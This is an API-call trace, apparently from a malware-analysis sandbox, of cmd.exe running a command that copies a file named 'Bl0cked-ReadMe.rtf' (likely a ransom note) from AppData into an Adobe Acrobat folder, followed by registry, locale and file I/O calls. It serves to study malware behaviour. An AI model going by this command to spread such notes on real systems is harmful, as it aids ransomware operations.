0x0 [0146.104] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0146.104] GetCurrentThreadId () returned 0x968 [0146.104] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x968) returned 0x38 [0146.104] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.104] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0146.104] SetThreadUILanguage (LangId=0x0) returned 0x409 [0146.104] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0146.104] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cfc4c | out: phkResult=0x1cfc4c*=0x0) returned 0x2 [0146.104] VirtualQuery (in: lpAddress=0x1cfc83, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0x1cf000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd0000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd0000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd1000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd1000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0xd3000, lpBuffer=0x1cfc1c, dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0xd3000, AllocationBase=0xd0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0146.104] VirtualQuery (in: lpAddress=0x1d0000, lpBuffer=0x1cfc1c, 
dwLength=0x1c | out: lpBuffer=0x1cfc1c*(BaseAddress=0x1d0000, AllocationBase=0x1d0000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0146.104] GetConsoleOutputCP () returned 0x1b5 [0146.105] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.105] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0146.105] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.105] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0146.105] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.105] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0146.105] _get_osfhandle (_FileHandle=0) returned 0x3 [0146.105] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0146.106] GetEnvironmentStringsW () returned 0x3b01c8* [0146.106] FreeEnvironmentStringsW (penv=0x3b01c8) returned 1 [0146.106] GetEnvironmentStringsW () returned 0x3b01c8* [0146.106] FreeEnvironmentStringsW (penv=0x3b01c8) returned 1 [0146.106] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebbc | out: phkResult=0x1cebbc*=0x40) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x1, 
lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegCloseKey (hKey=0x40) returned 0x0 [0146.106] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x1cebbc | out: phkResult=0x1cebbc*=0x40) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x40, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: 
hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x1, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x0, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.106] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x4, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x4) returned 0x0 [0146.107] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x1cebc4, lpData=0x1cebc8, lpcbData=0x1cebc0*=0x1000 | out: lpType=0x1cebc4*=0x0, lpData=0x1cebc8*=0x9, lpcbData=0x1cebc0*=0x1000) returned 0x2 [0146.107] RegCloseKey (hKey=0x40) returned 0x0 [0146.107] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886374 [0146.107] srand (_Seed=0x5b886374) [0146.107] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" [0146.107] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf\"" [0146.107] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.107] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3b1928, nSize=0x104 | out: 
lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0146.107] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0146.107] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0146.107] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0146.107] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0146.107] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0146.107] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0146.107] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0146.107] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0146.108] GetEnvironmentStringsW () returned 0x3b2318* [0146.108] FreeEnvironmentStringsW (penv=0x3b2318) returned 1 [0146.108] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.108] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0146.108] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0146.108] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0146.108] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0146.108] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 
[0146.108] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0146.108] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0146.108] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0146.108] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0146.108] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1cf988 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.108] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1cf988, lpFilePart=0x1cf984 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1cf984*="Desktop") returned 0x18 [0146.108] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.108] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.108] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.108] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.109] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.109] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1cf704 | out: lpFindFileData=0x1cf704) returned 0x3b0058 [0146.109] FindClose (in: hFindFile=0x3b0058 | out: hFindFile=0x3b0058) returned 1 [0146.109] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0146.109] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0146.109] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0146.109] GetEnvironmentStringsW () returned 0x3b2b38* [0146.109] FreeEnvironmentStringsW (penv=0x3b2b38) returned 1 [0146.109] GetCurrentDirectoryW (in: nBufferLength=0x104, 
lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.109] GetConsoleOutputCP () returned 0x1b5 [0146.110] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0146.110] GetUserDefaultLCID () returned 0x409 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="0") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="0") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1cfac8, cchData=128 | out: lpLCData="1") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0146.110] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 
[0146.110] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0146.111] GetConsoleTitleW (in: lpConsoleTitle=0x3a0910, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.111] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0146.111] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0146.112] _wcsicmp (_String1="type", _String2=")") returned 75 [0146.112] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0146.112] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0146.112] _wcsicmp (_String1="IF", _String2="type") returned -11 [0146.112] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0146.112] _wcsicmp (_String1="REM", _String2="type") returned -2 [0146.112] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] _get_osfhandle (_FileHandle=1) returned 0x7 [0146.116] GetFileType (hFile=0x7) returned 0x2 [0146.116] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0146.116] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x1cf9c0 | out: lpMode=0x1cf9c0) returned 1 [0146.116] _dup (_FileHandle=1) returned 3 [0146.117] _close (_FileHandle=1) returned 0 [0146.117] _wcsicmp (_String1="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0146.117] CreateFileW (lpFileName="C:\\Users\\ALLUSE~1\\Adobe\\Acrobat\\10.0\\REPLIC~1\\Security\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\alluse~1\\adobe\\acrobat\\10.0\\replic~1\\security\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x1cf990, dwCreationDisposition=0x2, 
dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0146.118] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0146.118] GetConsoleTitleW (in: lpConsoleTitle=0x1cf7c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0146.118] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0146.118] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0146.118] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0146.118] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0146.119] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0146.119] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x1cf324, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1cf324) returned 0x3a0ec8 [0146.119] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0146.119] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0146.119] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0146.119] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x1ce230, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0146.120] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] GetFileType (hFile=0x54) returned 0x1 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x1ce288 | out: lpFileSizeHigh=0x1ce288*=0x0) returned 0x1632 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] 
SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0146.120] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.120] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] GetFileType (hFile=0x4c) returned 0x1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] GetFileType (hFile=0x4c) returned 0x1 [0146.121] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.121] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | 
out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf250*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf250*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.122] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.122] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf2a0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf2a0*, lpNumberOfBytesWritten=0x1ce2a4*=0x20, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.123] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ce290 | out: lpNewFilePointer=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=4) returned 0x54 [0146.123] ReadFile (in: hFile=0x54, lpBuffer=0x1cf0c0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ce2b0, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesRead=0x1ce2b0*=0x200, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf0c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf0c0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf110*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf110*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf160*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf160*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf1b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf1b0*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] WriteFile (in: hFile=0x4c, lpBuffer=0x1cf200*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ce2a4, lpOverlapped=0x0 | out: lpBuffer=0x1cf200*, lpNumberOfBytesWritten=0x1ce2a4*=0x50, lpOverlapped=0x0) returned 1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c [0146.123] GetFileType (hFile=0x4c) returned 0x1 [0146.123] _get_osfhandle (_FileHandle=1) returned 0x4c 
